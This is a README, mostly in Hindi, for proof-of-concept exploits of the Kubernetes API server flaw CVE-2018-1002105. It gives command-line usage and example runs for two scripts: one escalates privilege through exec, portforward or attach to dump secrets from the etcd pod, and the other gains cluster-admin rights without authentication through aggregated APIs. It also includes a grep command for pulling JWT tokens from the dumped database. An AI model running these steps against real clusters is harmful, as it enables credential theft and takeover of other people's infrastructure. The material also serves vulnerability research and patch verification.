
CVE-2018-1002105 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो Kubernetes API सर्वर को लक्षित करता है। exec, portforward, या attach विधियों के माध्यम से secrets डंप करने या cluster-admin अधिकार प्राप्त करने के लिए प्रमाणित और अप्रमाणित privilege escalation का समर्थन करता है।
CVE-2018-1002105 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। वर्तमान एक्सप्लॉइट को pods और pods/exec पर create और get विशेषाधिकारों की आवश्यकता होती है। portforward और attach के लिए समर्थन जोड़ा गया है, जिन्हें समान अनुमतियों की आवश्यकता होती है।
वर्तमान PoC डिफ़ॉल्ट etcd-kubernetes पॉड से सीक्रेट डंप करता है।
कार्य में PoC:
usage: poc.py [-h] --target TARGET --jwt TOKEN [--namespace NAMESPACE] --pod
POD --method {exec,portforward,attach}
[--privileged-namespace PNAMESPACE] [--privileged-pod PPOD]
[--container CONTAINER] [--command COMMAND]
[--filename FILENAME]
PoC for CVE-2018-1002105.
optional arguments:
-h, --help show this help message and exit
required arguments:
--target TARGET, -t TARGET
API server target:port
--jwt TOKEN, -j TOKEN
JWT token for service account
--namespace NAMESPACE, -n NAMESPACE
Namespace with method access
--pod POD, -p POD Pod with method access
--method {exec,portforward,attach}, -m {exec,portforward,attach}
optional arguments:
--privileged-namespace PNAMESPACE, -s PNAMESPACE
Target namespace
--privileged-pod PPOD, -e PPOD
Target privileged pod
--container CONTAINER, -c CONTAINER
Target container
--command COMMAND, -x COMMAND
Command to execute
--filename FILENAME, -f FILENAME
File to save output to
उदाहरण:
$ ./poc.py -t 10.0.2.15:6443 --jwt [token] -p [pod] -f etcd.out -m attach
[*] Building pipe using attach...
[+] Pipe opened :D
[*] Attempting code exec on etcd-kubernetes/etcd
[*] Writing output to etcd.out ....
[+] Done!
टोकन की जाँच करें:
$ grep -air eyJ etcd.db
अप्रमाणित PoC उजागर API के संदर्भ में विशेषाधिकार वृद्धि की अनुमति देता है। API की कार्यक्षमताओं के आधार पर पॉड्स पर कोड निष्पादन प्राप्त करना संभव हो सकता है। यह डेमो वर्तमान में servicecatalog.k8s.io API पर cluster-admin अधिकार प्राप्त करने के लिए इस बग का शोषण करता है। यह एक्सप्लॉइट metrics.k8s.io या एग्रीगेटेड परत के माध्यम से उजागर किसी भी API के लिए भी काम करना चाहिए।
कार्य में PoC:
usage: unauth_poc.py [-h] --target TARGET [--api-base BASE]
[--api-target TARGET_API] [--api-version VERSION]
[--json] [--filename FILENAME]
Unauthenticated PoC for CVE-2018-1002105
optional arguments:
-h, --help show this help message and exit
required arguments:
--target TARGET, -t TARGET
API server target:port
--api-base BASE, -b BASE
Target API name i.e. "servicecatalog.k8s.io"
--api-target TARGET_API, -u TARGET_API
API to access i.e. "clusterservicebrokers"
optional arguments:
--api-version VERSION, -a VERSION
API version to use i.e. "v1beta1"
--json, -j Print json output
--filename FILENAME, -f FILENAME
File to save output to
उदाहरण:
$ ./unauth_poc.py -t 10.0.2.15:6443 --json -f api.out
[*] Building pipe ...
[+] Pipe opened :D
[*] Attempting to access url
[+] Pipe opened :D
[*] Writing output to api.out ....
[+] Done!